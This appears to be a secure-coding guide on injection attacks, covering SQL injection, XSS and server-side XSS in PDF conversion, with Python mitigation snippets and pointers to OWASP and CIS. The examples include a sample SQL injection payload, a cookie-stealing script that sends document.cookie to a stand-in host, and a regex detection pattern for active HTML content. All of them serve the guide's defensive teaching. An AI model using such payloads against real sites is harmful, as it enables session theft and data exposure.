Code injection is the exploitation of a bug in software through which the attacker can change the expected course of execution. The two most famous injection vulnerabilities are the SQL injection attack, through which values in a database can be modified, and the Cross-site scripting, or XSS, attack, through which code can be injected into a victim's HTML page. Injection attacks can also be used to assume another user's authentication, or to trigger data loss. While there are different ways to handle injection attacks, all remediation suggestions broadly fall into the category of "when accepting untrusted data, i.e., any data from a user, restrict its value as much as possible so it does not deviate from expectations, get misinterpreted by the application, and cause unintended side effects". This is a very loosely defined statement, and worse, its scope can change as the software and related infrastructure evolve. Maybe your software starts as a REST application and you don't worry about escaping HTML text when storing it. Over time, you add behavior allowing users to convert HTML files to PDF, and suddenly your site becomes XSS-vulnerable! Hence, adherence to best practices and continuous monitoring are needed to ensure that the application is not susceptible to injection attacks.
SQL injection
SQL injection is an attack using the code injection technique, and is used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. SQL injection exploits a security vulnerability in an application's software when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or is not strongly typed and gets unexpectedly executed. Here is an XKCD link that explains the attack and its mitigation in a very simple manner. The good news is that many web frameworks provide standard utilities to ensure that SQL injection attacks do not happen. Unless they are knowingly bypassed, it has become much less likely to fall victim to an SQL injection attack.
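The standard utility in question is the parameterized (prepared) query, which every mainstream database driver provides. The sketch below, using Python's built-in sqlite3 module with an in-memory database, contrasts a vulnerable string-concatenated query with its parameterized equivalent:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

# Classic injection payload entered into a "name" field.
malicious = "alice' OR '1'='1"

# Vulnerable: concatenation lets the input rewrite the query itself,
# so the OR clause matches every row in the table.
vulnerable = conn.execute(
    "SELECT secret FROM users WHERE name = '" + malicious + "'"
).fetchall()

# Safe: a parameterized query treats the input purely as a value,
# and no user is literally named "alice' OR '1'='1".
safe = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (malicious,)
).fetchall()

print(vulnerable)  # [('s3cret',)]
print(safe)        # []
```

ORMs and query builders apply the same mechanism under the hood, which is why injection typically only reappears when raw SQL strings are assembled by hand.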
Cross-site scripting, or XSS
See details about XSS at Wikipedia, OWASP. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. For example, if a web application allows sending emails but does not filter the email content to remove attacking scripts, then an XSS attack can be effected by sending an email with malicious content to other users and having them open it in the browser. A troubling aspect of XSS is that there are various ways to perform these attacks, and they can occur anywhere a web application directly uses input from a user. As an extreme example, an XSS attack can even occur when a website tries to render user data as a PDF file. The two main solutions for handling XSS attacks are to verify / sanitize any text entry taken from the user, and to incorporate user data only at certain locations in the web page. For more details on XSS prevention, see the OWASP Cheatsheet.
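The "sanitize before use" step, when user data is destined for an HTML element body, amounts to escaping the characters the browser would interpret as markup. A minimal sketch using Python's standard library (the payload URL is made up):

```python
import html

# A typical cookie-stealing payload submitted as "user content".
user_input = '<script>location="https://evil.example/?c="+document.cookie</script>'

# Escape before inserting user data into an HTML context: the browser
# then renders the payload as inert text instead of executing it.
safe_fragment = html.escape(user_input)

print(safe_fragment)
# &lt;script&gt;location=&quot;https://evil.example/?c=&quot;+document.cookie&lt;/script&gt;
```

Escaping is context-dependent: a value placed inside an attribute, a URL, or a script block needs different treatment, which is exactly what the OWASP Cheatsheet referenced above catalogues.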
Server side XSS
A server side XSS is an XSS attack where another server is the victim. This may happen when unsafe user data is processed by a server as part of a business workflow, at which time the attack is effected. The vulnerability can manifest itself in multiple ways. For example, as shown here, a server side XSS attack can happen when HTML is processed and converted to a PDF file. Or perhaps the unsafe data got logged to a file and was picked up by some other process, which then became the target of the attack. Vulnerability to such attacks depends on analysis of the workflow and can change from one workflow to another. Generally, any server-side processing of a user-uploaded file should be done in a controlled virtual workspace, to prevent such attacks from leaking data to an outside domain or affecting the server hosting the application.
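Alongside sandboxing, a conservative pre-check before handing user HTML to a converter can reject documents containing active content outright. The sketch below is a deliberately blunt illustration of that idea, not a substitute for a real sanitizer library, and the rejected constructs are only a sample:

```python
import re

# Reject rather than clean: if the uploaded document contains any of
# these active-content markers, refuse to run it through the converter.
ACTIVE_CONTENT = re.compile(
    r"<\s*(script|iframe|object|embed)\b"  # active elements
    r"|on\w+\s*="                          # inline event handlers
    r"|javascript:",                       # javascript: URLs
    re.IGNORECASE,
)

def looks_safe_for_conversion(document: str) -> bool:
    # True only when none of the known active-content markers appear.
    return ACTIVE_CONTENT.search(document) is None

assert looks_safe_for_conversion("<p>Quarterly report</p>")
assert not looks_safe_for_conversion('<img src=x onerror="steal()">')
```

Because HTML admits many obfuscated encodings, such pattern checks are best treated as one defensive layer on top of running the converter in an isolated environment with no network access.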
Security related resources
The following resources are useful references for security related terminology, best practices, blogs, etc.
Center for Internet Security, or CIS
CIS home page can be found here. In particular, note the 20-point guidelines provided by CIS covering various aspects of software security.
Mozilla WebAppSec
The Mozilla Web Application Security wiki provides a list of secure coding guidelines that is extremely useful.
Open Web Application Security Project, or OWASP
OWASP is a nonprofit foundation that works to improve the security of software. The OWASP Top 10 vulnerabilities list is a good place to check for the more common security issues that should be identified and rectified in an application. A complete list of OWASP projects can be found here.